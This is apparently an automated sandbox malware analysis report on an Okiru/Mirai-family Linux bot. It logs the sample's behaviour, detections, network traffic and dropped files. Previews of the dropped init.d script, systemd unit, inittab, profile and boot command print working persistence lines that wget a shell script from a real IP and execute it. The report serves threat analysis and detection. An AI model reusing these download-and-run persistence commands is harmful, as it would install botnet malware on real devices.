Source: /usr/bin/chmod (PID: 5560)	File: /etc/init.d/sh (bits: - usr: rx grp: rx all: rwx)	Jump to behavior

Source: /tmp/x86_32.nn.elf (PID: 5567)	File opened: /proc/5580/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5567)	File opened: /proc/5585/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5567)	File opened: /proc/5343/cmdline	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5567)	File opened: /proc/5620/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5567)	File opened: /proc/5618/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5567)	File opened: /proc/5619/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5567)	File opened: /proc/5577/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5567)	File opened: /proc/5610/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5567)	File opened: /proc/5611/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5567)	File opened: /proc/5732/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5567)	File opened: /proc/5613/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5567)	File opened: /proc/5614/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5567)	File opened: /proc/5615/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5567)	File opened: /proc/5616/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5567)	File opened: /proc/5617/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5567)	File opened: /proc/5630/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5567)	File opened: /proc/5631/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5567)	File opened: /proc/5629/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5567)	File opened: /proc/5706/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5567)	File opened: /proc/1/cmdline	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5567)	File opened: /proc/5707/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5567)	File opened: /proc/5708/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5567)	File opened: /proc/5709/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5567)	File opened: /proc/322/cmdline	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5567)	File opened: /proc/5621/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5567)	File opened: /proc/5622/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5567)	File opened: /proc/5623/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5567)	File opened: /proc/803/cmdline	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5567)	File opened: /proc/5624/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5567)	File opened: /proc/5625/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5567)	File opened: /proc/5626/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5567)	File opened: /proc/5627/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5567)	File opened: /proc/5628/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5567)	File opened: /proc/5705/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5567)	File opened: /proc/5641/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5567)	File opened: /proc/5717/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5567)	File opened: /proc/5718/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5567)	File opened: /proc/5719/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5567)	File opened: /proc/5632/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5567)	File opened: /proc/5710/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5567)	File opened: /proc/5711/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5567)	File opened: /proc/5712/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5567)	File opened: /proc/5713/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5567)	File opened: /proc/5714/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5567)	File opened: /proc/5715/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5567)	File opened: /proc/5716/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5567)	File opened: /proc/5720/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5567)	File opened: /proc/5721/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5567)	File opened: /proc/5689/status	Jump to behavior

Source: /tmp/x86_32.nn.elf (PID: 5526)	Shell command executed: sh -c "systemctl enable custom.service >/dev/null 2>&1"	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5554)	Shell command executed: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5556)	Shell command executed: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5558)	Shell command executed: sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh'\n /bin/sh &\n wget http://94.156.227.229/lol.sh -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh'\n killall sh\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start\|stop\|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh"	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5559)	Shell command executed: sh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1"	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5561)	Shell command executed: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5563)	Shell command executed: sh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1"	Jump to behavior

Source: /bin/sh (PID: 5555)	Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/system			Jump to behavior
Source: /bin/sh (PID: 5560)	Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/sh			Jump to behavior

Source: /bin/sh (PID: 5562)

Mkdir executable: /usr/bin/mkdir -> mkdir -p /etc/rc.d

Jump to behavior

Source: /bin/sh (PID: 5535)

Systemctl executable: /usr/bin/systemctl -> systemctl enable custom.service

Jump to behavior

Source: /tmp/x86_32.nn.elf (PID: 5515)	File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 5555)	File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 5560)	File: /etc/init.d/sh (bits: - usr: rx grp: rx all: rwx)	Jump to behavior

Source: /tmp/x86_32.nn.elf (PID: 5515)	Writes shell script file to disk with an unusual file extension: /etc/init.d/system	Jump to dropped file
Source: /tmp/x86_32.nn.elf (PID: 5515)	Writes shell script file to disk with an unusual file extension: /etc/rc.local	Jump to dropped file
Source: /bin/sh (PID: 5558)	Writes shell script file to disk with an unusual file extension: /etc/init.d/sh	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Drops files in suspicious directories

Source: /tmp/x86_32.nn.elf (PID: 5515)	File: /etc/init.d/system			Jump to dropped file
Source: /bin/sh (PID: 5558)	File: /etc/init.d/sh			Jump to dropped file

Sample deletes itself

Source: /tmp/x86_32.nn.elf (PID: 5568)

File: /tmp/x86_32.nn.elf

Jump to behavior

Stealing of Sensitive Information

Yara detected Okiru

Source: Yara match	File source: x86_32.nn.elf, type: SAMPLE
Source: Yara match	File source: 5515.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: x86_32.nn.elf PID: 5515, type: MEMORYSTR

Remote Access Functionality

Yara detected Okiru

Source: Yara match	File source: x86_32.nn.elf, type: SAMPLE
Source: Yara match	File source: 5515.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: x86_32.nn.elf PID: 5515, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	2 Scripting	Valid Accounts	Windows Management Instrumentation	1 Unix Shell Configuration Modification	1 Unix Shell Configuration Modification	1 Masquerading	1 OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Non-Standard Port	Exfiltration Over Other Network Medium	1 Data Manipulation
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Systemd Service	1 Systemd Service	2 File and Directory Permissions Modification	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Scripting	Logon Script (Windows)	1 File Deletion	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
x86_32.nn.elf	21%	ReversingLabs	Linux.Backdoor.Mirai
x86_32.nn.elf	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
/etc/rc.local	0%	ReversingLabs

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://94.156.227.229/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s	0%	Avira URL Cloud	safe
http://94.156.227.229/lol.sh	100%	Avira URL Cloud	malware
http://94.156.227.229/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
daisy.ubuntu.com	162.213.35.25	true	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://94.156.227.229/	x86_32.nn.elf	false	Avira URL Cloud: safe	unknown
http://94.156.227.229/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s	x86_32.nn.elf	false	Avira URL Cloud: safe	unknown
http://94.156.227.229/lol.sh	x86_32.nn.elf, 5515.1.00000000ffb29000.00000000ffb4a000.rw-.sdmp, profile.12.dr, system.12.dr, inittab.12.dr, sh.30.dr, bootcmd.12.dr, custom.service.12.dr	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
94.156.227.234	unknown	Bulgaria		57463	NETIXBG	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
94.156.227.234	powerpc.nn.elf	Get hash	malicious	Okiru	Browse
	x86_64.nn.elf	Get hash	malicious	Okiru	Browse
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse
	powerpc.nn.elf	Get hash	malicious	Okiru	Browse
	sparc.nn.elf	Get hash	malicious	Okiru	Browse
	arm7.nn-20241224-0652.elf	Get hash	malicious	Mirai, Okiru	Browse
	arm.nn-20241224-0652.elf	Get hash	malicious	Okiru	Browse
	mips.nn.elf	Get hash	malicious	Okiru	Browse
	arm5.nn.elf	Get hash	malicious	Okiru	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
daisy.ubuntu.com	m68k.nn.elf	Get hash	malicious	Okiru	Browse	162.213.35.24
	db0fa4b8db0333367e9bda3ab68b8042.arc.elf	Get hash	malicious	Gafgyt, Mirai	Browse	162.213.35.24
	RpcSecurity.x86.elf	Get hash	malicious	Unknown	Browse	162.213.35.24
	.i.elf	Get hash	malicious	Unknown	Browse	162.213.35.24
	RpcSecurity.arm7.elf	Get hash	malicious	Mirai	Browse	162.213.35.25
	RpcSecurity.mpsl.elf	Get hash	malicious	Unknown	Browse	162.213.35.25
	RpcSecurity.ppc.elf	Get hash	malicious	Unknown	Browse	162.213.35.25
	RpcSecurity.arm.elf	Get hash	malicious	Unknown	Browse	162.213.35.24
	RpcSecurity.spc.elf	Get hash	malicious	Unknown	Browse	162.213.35.24
	RpcSecurity.mips.elf	Get hash	malicious	Unknown	Browse	162.213.35.25

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NETIXBG	powerpc.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	x86_64.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	powerpc.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	sparc.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	arm7.nn-20241224-0652.elf	Get hash	malicious	Mirai, Okiru	Browse	94.156.227.234
	arm.nn-20241224-0652.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	mips.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	arm5.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
/etc/rc.local	m68k.nn.elf	Get hash	malicious	Okiru	Browse
	powerpc.nn.elf	Get hash	malicious	Okiru	Browse
	x86_64.nn.elf	Get hash	malicious	Okiru	Browse
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse
	powerpc.nn.elf	Get hash	malicious	Okiru	Browse
	sparc.nn.elf	Get hash	malicious	Okiru	Browse
	arm7.nn-20241224-0652.elf	Get hash	malicious	Mirai, Okiru	Browse
	arm.nn-20241224-0652.elf	Get hash	malicious	Okiru	Browse
	mips.nn.elf	Get hash	malicious	Okiru	Browse

Created / dropped Files

/boot/bootcmd

Download File

Process:	/tmp/x86_32.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	117
Entropy (8bit):	4.611465664935645
Encrypted:	false
SSDEEP:	3:KPJRK+KFtSyLdjX43LbaaFOdFXa5O:WJ8+KHSYZX47baaeXCO
MD5:	5048E92AD58F7747D00978468934F1CB
SHA1:	0DB71D81203AA33366E877D18275460E8D073848
SHA-256:	828A051E2C55674E95B341A0FC26ADA8F8390C9AFCF4E41EFA24A8EF06B4978D
SHA-512:	60BFF7E87BD8BFA48680F4E4666435D4853FA68B2265366C8193B17BABAFD0416AABBC8A4C8C183E3A1FC5F70999726066B729849F48C71E6784EB14141191DD
Malicious:	false
Reputation:	low
Preview:	run bootcmd_mmc0; /bin/sh && wget http://94.156.227.229/lol.sh -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.

/etc/init.d/sh

Download File

Process:	/bin/sh
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	361
Entropy (8bit):	4.413818877229108
Encrypted:	false
SSDEEP:	6:h2Rk8d/Kd6Nx/SNAjDTZX47JaJFCwWBvM1FnwfUMdNfabwHeJdxL/RuYHdSOovpD:QRkobNxaNoKUJgjvM1F5KN+dRRucSOyl
MD5:	91BDEB7CE9566CE3AFA89BAD9FE3196A
SHA1:	82A5A53602B46466A353BF97C355E27B5A0559BA
SHA-256:	4DA30E74C2351DE13124E29852D476658180D8CAE3A77D5AFE1629684E53FFC0
SHA-512:	8D25F01129757B00D56C69A04E7B14F4FE298D906E138DDF10E16D4FA8E0F8932A4DC20B75879DC6A49D2FD93CE6C87A8A387EEB5B9450F512C43B212F91427A
Malicious:	true
Reputation:	low
Preview:	#!/bin/sh.# /etc/init.d/sh..case "" in. start). echo 'Starting sh'. /bin/sh &. wget http://94.156.227.229/lol.sh -O /tmp/lol.sh. chmod +x /tmp/lol.sh. /tmp/lol.sh &. ;;. stop). echo 'Stopping sh'. killall sh. ;;. restart). sh stop. sh start. ;;. *). echo "Usage: sh {start\|stop\|restart}". exit 1. ;;.esac.exit 0.

/etc/init.d/system

Download File

Process:	/tmp/x86_32.nn.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	104
Entropy (8bit):	4.549982831581783
Encrypted:	false
SSDEEP:	3:TKH4v9+KFyFiLdjX43LpaKB0dFLoKE0:h8KooZX47zBeLXE0
MD5:	F91F2A4D88C73DFC7F71AF07E7244FBD
SHA1:	A0EBF1224A9C0AB64D6F379CF2D3F6EF5FF35D2B
SHA-256:	786AE2C2150AF9274605E00A4580CC998F66B051258892917E510F8C5978FF14
SHA-512:	BEF8101B6C00053E7B8DB9F21A393525520F007B33E6B7F21A0DF3936B7C802AEC1DE66E8B1FF217006507B6D5C88398DDB6F79DB0C01650025EDBB97B6D7CF3
Malicious:	true
Reputation:	low
Preview:	#!/bin/sh./bin/sh &.wget http://94.156.227.229/lol.sh -O /tmp/lol.sh.chmod +x /tmp/lol.sh./tmp/lol.sh &.

/etc/inittab

Download File

Process:	/tmp/x86_32.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	109
Entropy (8bit):	4.555715788256913
Encrypted:	false
SSDEEP:	3:nAWu5YFtSyLdjX43LbaaFOdFXa5O:A6HSYZX47baaeXCO
MD5:	2DF91F4FB4FBD0738FC347B0C09F0CEA
SHA1:	E905F83DF7076F5646E0728C946C4C7D0483DFF9
SHA-256:	9023CDD1CAB339E440D341143E390AA31824A3BA8CF3AE8BD7E80B61D63A5569
SHA-512:	5E935A8BCAE88974C3302DB840F1F957F96C5C6D41418A369CA1B69236E8FB28BAA9F66F8F8A232C8A7CBADA4DB9BFA7637677A672CD33A2132FF8D64465B3C0
Malicious:	false
Reputation:	low
Preview:	::respawn:/bin/sh && wget http://94.156.227.229/lol.sh -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.

/etc/motd

Download File

Process:	/tmp/x86_32.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	53
Entropy (8bit):	3.871459242626451
Encrypted:	false
SSDEEP:	3:yGKtARxFQFrgBJ4BJ+3e:dQ0EcHG2e
MD5:	2BD9B4BE30579E633FC0191AA93DF486
SHA1:	7D63A9BD9662E86666B27C1B50DB8E7370C624FF
SHA-256:	64DC39F3004DC93C9FC4F1467B4807F2D8E3EB0BFA96B15C19CD8E7D6FA77A1D
SHA-512:	AE6DD7B39191354CF43CF65E517460D7D4C61B8F5C08E33E6CA3C451DC7CAB4DE89F33934C89396B80F1AADE0A4E2571BD5AE8B76EF80B737D4588703D2814D5
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	gorilla botnet is on the device ur not a cat go away.

/etc/profile

Download File

Process:	/tmp/x86_32.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	100
Entropy (8bit):	4.42736323501118
Encrypted:	false
SSDEEP:	3:pKWNFyFiLdjX43LbaaFOdFXa50:kKooZX47baaeXC0
MD5:	6BDCD8C4621FF9685F1F2BAA41133C78
SHA1:	EF43494B05CBEEEE55D04AEF3528A2AA0A6DA1F8
SHA-256:	E8AFF9F1C83A562747D04B2A1075E89DD4825ED201BE9A4A6F697DA42B5AAEDF
SHA-512:	5FA4B0EE10F3B280380F2A303F3228CC5D7914129A78DE8F47885E860A8BAC41BF226C8C2814116593FC6937E4DD363A96E55945697CF32B60294F9E1CAF7EC9
Malicious:	true
Reputation:	low
Preview:	/bin/sh &.wget http://94.156.227.229/lol.sh -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh &.

/etc/rc.local

Download File

Process:	/tmp/x86_32.nn.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	10
Entropy (8bit):	3.121928094887362
Encrypted:	false
SSDEEP:	3:TKH4vn:hv
MD5:	3E2B31C72181B87149FF995E7202C0E3
SHA1:	BD971BEC88149956458A10FC9C5ECB3EB99DD452
SHA-256:	A8076D3D28D21E02012B20EAF7DBF75409A6277134439025F282E368E3305ABF
SHA-512:	543F39AF1AE7A2382ED869CBD1EE1AC598A88EB4E213CD64487C54B5C37722C6207EE6DB4FA7E2ED53064259A44115C6DA7BBC8C068378BB52A25E7088EEEBD6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: m68k.nn.elf, Detection: malicious, Browse Filename: powerpc.nn.elf, Detection: malicious, Browse Filename: x86_64.nn.elf, Detection: malicious, Browse Filename: x86_32.nn.elf, Detection: malicious, Browse Filename: mipsel.nn.elf, Detection: malicious, Browse Filename: powerpc.nn.elf, Detection: malicious, Browse Filename: sparc.nn.elf, Detection: malicious, Browse Filename: arm7.nn-20241224-0652.elf, Detection: malicious, Browse Filename: arm.nn-20241224-0652.elf, Detection: malicious, Browse Filename: mips.nn.elf, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	#!/bin/sh.

/etc/systemd/system/custom.service

Download File

Process:	/tmp/x86_32.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	298
Entropy (8bit):	5.048842181507798
Encrypted:	false
SSDEEP:	6:z8ifitRZAMzdK+Gs2+GWRAZX47N2+GWRo3UN2+GWRuLYACGX9LQmWA4Rv:zNitRZAOK+y+GWRkKY+GWRXY+GWRuL1I
MD5:	AEC69B92F08E955E33C19CECDDBBAD0C
SHA1:	644E1CFC37AA49361C5E79EB57B4740B210F1D90
SHA-256:	4177912BFC8C7BA82B99473ACABEE592E860966770E0FC755E877B1AF4D05F08
SHA-512:	786D665A6F8678529610E8F6DF99C469A786577F042C358DA4E3589D554B475A6401B037D5C8708FDD57014EDB517EC17786FC95548CC9D5A9A81AF5476C8D44
Malicious:	false
Preview:	[Unit].Description=Custom Binary and Payload Service.After=network.target..[Service].ExecStart=/bin/sh.ExecStartPost=/usr/bin/wget http://94.156.227.229/lol.sh -O /tmp/lol.sh.ExecStartPost=/bin/chmod +x /tmp/lol.sh.ExecStartPost=/tmp/lol.sh.Restart=on-failure..[Install].WantedBy=multi-user.target.

/memfd:snapd-env-generator (deleted)

Download File

Process:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File Type:	ASCII text
Category:	dropped
Size (bytes):	76
Entropy (8bit):	3.7627880354948586
Encrypted:	false
SSDEEP:	3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
MD5:	D86A1F5765F37989EB0EC3837AD13ECC
SHA1:	D749672A734D9DEAFD61DCA501C6929EC431B83E
SHA-256:	85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
SHA-512:	338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
Malicious:	false
Preview:	PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.

Static File Info

General

File type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
Entropy (8bit):	6.515677638743701
TrID:	ELF Executable and Linkable format (Linux) (4029/14) 50.16% ELF Executable and Linkable format (generic) (4004/1) 49.84%
File name:	x86_32.nn.elf
File size:	79'312 bytes
MD5:	21dd74becf40d7fa78e56c5c0c66ff40
SHA1:	eb54e66334ad69a8beba62ea0b9891082a48a6b3
SHA256:	e85bc50197427182648d728ef66e05f1f0e96b4ed55148338df4bb32a0da257b
SHA512:	df2dc06aafb94f58504153da3c5a311cc6105188586cc9d28e65ba53ef531ea302f5470854f66d7d993d1c8447c835c8c849f8d096edb282e3650d5fdcf27e62
SSDEEP:	1536:zOo460UiIN0Dbi03iu9gmPHGj6Jfg7iLAwKayvJM7EIbwlZAlaKASKF8:zOo47UiINMbi0yu9g0H347ikwKayvS77
TLSH:	08734AC0E983E9F5EE4611750637B73ACB72E5BE1138EA17DB64A933F942600D25239C
File Content Preview:	.ELF....................d...4...@4......4. ...(.....................\+..\+...............0...............)..........Q.td............................U..S.......w/...h....c...[]...$.............U......=.....t..5....$......$.......u........t....h\...........

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, little endian
Version:	1 (current)
Machine:	Intel 80386
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x8048164
Flags:	0x0
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	3
Section Header Offset:	78912
Section Header Size:	40
Number of Section Headers:	10
Header String Table Index:	9

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.init	PROGBITS	0x8048094	0x94	0x1c	0x0	0x6	AX	1
.text	PROGBITS	0x80480b0	0xb0	0x10486	0x0	0x6	AX	16
.fini	PROGBITS	0x8058536	0x10536	0x17	0x0	0x6	AX	1
.rodata	PROGBITS	0x8058560	0x10560	0x25fc	0x0	0x2	A	32
.ctors	PROGBITS	0x805b000	0x13000	0x8	0x0	0x3	WA	4
.dtors	PROGBITS	0x805b008	0x13008	0x8	0x0	0x3	WA	4
.data	PROGBITS	0x805b020	0x13020	0x3e0	0x0	0x3	WA	32
.bss	NOBITS	0x805b400	0x13400	0x25e0	0x0	0x3	WA	32
.shstrtab	STRTAB	0x0	0x13400	0x3e	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x8048000	0x8048000	0x12b5c	0x12b5c	6.5909	0x5	R E	0x1000	.init .text .fini .rodata
LOAD	0x13000	0x805b000	0x805b000	0x400	0x29e0	5.3300	0x6	RW	0x1000	.ctors .dtors .data .bss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x6	RW	0x4

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 27, 2024 09:14:51.426903009 CET	51358	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:14:51.546542883 CET	38242	51358	94.156.227.234	192.168.2.14
Dec 27, 2024 09:14:51.546607971 CET	51358	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:14:51.546649933 CET	51358	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:14:51.666403055 CET	38242	51358	94.156.227.234	192.168.2.14
Dec 27, 2024 09:14:52.106605053 CET	51358	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:14:52.266940117 CET	38242	51358	94.156.227.234	192.168.2.14
Dec 27, 2024 09:14:52.670624018 CET	38242	51358	94.156.227.234	192.168.2.14
Dec 27, 2024 09:14:52.670684099 CET	51358	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:14:53.133426905 CET	51360	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:14:53.253142118 CET	38242	51360	94.156.227.234	192.168.2.14
Dec 27, 2024 09:14:53.253228903 CET	51360	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:14:53.253277063 CET	51360	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:14:53.372909069 CET	38242	51360	94.156.227.234	192.168.2.14
Dec 27, 2024 09:14:53.776676893 CET	51360	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:14:53.938985109 CET	38242	51360	94.156.227.234	192.168.2.14
Dec 27, 2024 09:14:54.461481094 CET	38242	51360	94.156.227.234	192.168.2.14
Dec 27, 2024 09:14:54.461551905 CET	51360	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:14:54.780760050 CET	51362	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:14:54.900336027 CET	38242	51362	94.156.227.234	192.168.2.14
Dec 27, 2024 09:14:54.900441885 CET	51362	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:14:54.900441885 CET	51362	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:14:55.019939899 CET	38242	51362	94.156.227.234	192.168.2.14
Dec 27, 2024 09:14:55.485652924 CET	51362	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:14:55.646950960 CET	38242	51362	94.156.227.234	192.168.2.14
Dec 27, 2024 09:14:56.095972061 CET	38242	51362	94.156.227.234	192.168.2.14
Dec 27, 2024 09:14:56.096052885 CET	51362	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:14:56.488621950 CET	51364	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:14:56.608490944 CET	38242	51364	94.156.227.234	192.168.2.14
Dec 27, 2024 09:14:56.608587980 CET	51364	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:14:56.608629942 CET	51364	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:14:56.729175091 CET	38242	51364	94.156.227.234	192.168.2.14
Dec 27, 2024 09:14:57.123559952 CET	51364	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:14:57.287252903 CET	38242	51364	94.156.227.234	192.168.2.14
Dec 27, 2024 09:14:57.833214998 CET	38242	51364	94.156.227.234	192.168.2.14
Dec 27, 2024 09:14:57.833317995 CET	51364	38242	192.168.2.14	94.156.227.234
